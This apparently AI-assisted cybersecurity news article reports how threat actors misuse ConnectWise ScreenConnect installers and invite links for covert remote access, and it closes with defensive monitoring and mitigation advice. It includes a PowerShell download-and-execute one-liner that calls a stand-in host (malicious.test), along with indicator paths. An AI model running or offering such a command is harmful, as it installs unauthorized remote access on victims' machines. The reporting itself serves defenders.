Tuesday, August 11, 2026
LIVEThe Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///The Unrelenting Cyber Battle: Hacking Threats and the Imperative of Robust Data Protection///Navigating the Cyber Labyrinth: Bolstering Defenses Against Evolving Hacking Threats///The Dual Front War: Battling Hacking and Bolstering Data Protection in the Digital Age///The Ever-Evolving Cyber Threat Landscape: Navigating Hacking and Fortifying Data Protection///The Unseen Battle: Fortifying Data in an Age of Relentless Hacking///The Unseen War: Hacking's Relentless Advance and the Imperative of Data Protection///The Evolving Threat Landscape: Hacking, Data Protection, and the Imperative for Proactive Security///Navigating the Digital Minefield: Bolstering Data Protection in an Era of Relentless Hacking///The Dual Fronts of Digital Defense: Combating Hacking and Fortifying Data Protection///Hacking's New Frontier: Fortifying Data Protection in the Age of Advanced Cyber Threats///The Dual Front: Navigating Hacking Threats and Fortifying Data Protection in the Digital Age///Navigating the Digital Gauntlet: The Evolving Nexus of Hacking and Data Protection///
Subscribe
Cyber Security
Independent · Digital
Thehackingpost
CybersecurityAI-assisted

Threat Actors Exploit ScreenConnect to Gain Unauthorized Remote Access

Recent analyses have identified an increase in the misuse of remote management and monitoring (RMM) tools. Threat actors are increasingly using these tools to gain initial access, prompting a reevaluation of platforms that were traditionally intended for…

Recent analyses have identified an increase in the misuse of remote management and monitoring (RMM) tools. Threat actors are increasingly using these tools to gain initial access, prompting a reevaluation of platforms that were traditionally intended for legitimate IT administration purposes.

While AnyDesk has seen a decline in usage among cybercriminals due to enhanced detection measures, ConnectWise ScreenConnect has become a favored tool for covert intrusions and maintaining persistence within compromised systems.

RMM solutions provide features such as unattended control, scripting capabilities, file transfers, and session logging. These functionalities are attractive to both system administrators and malicious actors.

Attackers often employ phishing methods to direct victims to custom ScreenConnect installers or invite links generated through the management console. These phishing pages can appear as trusted support portals, deploying .msi installers that primarily execute in memory, leaving minimal traces on disk.

For instance, a PowerShell command can install the ScreenConnect agent without writing the full payload to disk:

powershell iex (New-Object Net.WebClient).DownloadString('https://malicious.test/Bin/ScreenConnect.ClientSetup.exe?e=Access&y=Guest')

Upon execution, the agent registers as a Windows service, allowing persistent remote access under the guise of legitimate IT maintenance.

Recent analyses have identified an increase in the misuse of remote management and monitoring (RMM) tools.
Natalie Rhodes · Thehackingpost

ScreenConnect operates across multiple platforms, including Windows, macOS, Linux, iOS, and Android, facilitating cross-platform control. After the initial .msi installer is launched from a temporary directory, the agent installs a client binary at:

C:\Program Files (x86)\ScreenConnect Client (<hash>)\ScreenConnect.WindowsClient.exe

This executable uses configuration files located in the system profile’s AppData folder, mapping custom access URLs to IPs and encrypted launch keys.

Malicious actors leverage the console's Build+ option to create custom installers or invite links, enabling staged deployment for victims. The flexibility of these tools presents a significant phishing threat.

During post-deployment, certain event IDs signal a new remote access session, and file transfers create directories under the victim's Documents folder:

C:\Users\Kh4lifa\Documents\ConnectWiseControl\Files

Advertisement

Defenders should monitor the ScreenConnect agent binary and its configuration files for potential threats. Look for unexpected MSI executions in temporary directories and services named ScreenConnect.WindowsClient.exe.

Organizations can mitigate risks by limiting access to RMM consoles, enforcing multifactor authentication, rotating API keys, and restricting custom builder generation to authorized personnel.

Memory snapshots are crucial for uncovering in-memory chat logs and transient keys. Incident response teams should validate DNS resolutions and IP addresses found in configuration files, as these may indicate command-and-control infrastructure.

Email gateways and web proxies should block recognized invite link patterns and scan downloaded .msi packages for anomalies. Detection rules for specific event IDs should be integrated into SIEM platforms to provide real-time alerts on suspicious remote sessions.

Understanding attacker techniques and indicators of compromise allows security teams to detect and prevent unauthorized access before it escalates into a breach.

Based on reporting by GBHackers.

AI transparency. This article was produced with the assistance of artificial intelligence and published under human editorial oversight. AI systems can make mistakes. Read how we use AI (EU AI Act, Art. 50).
Related Stories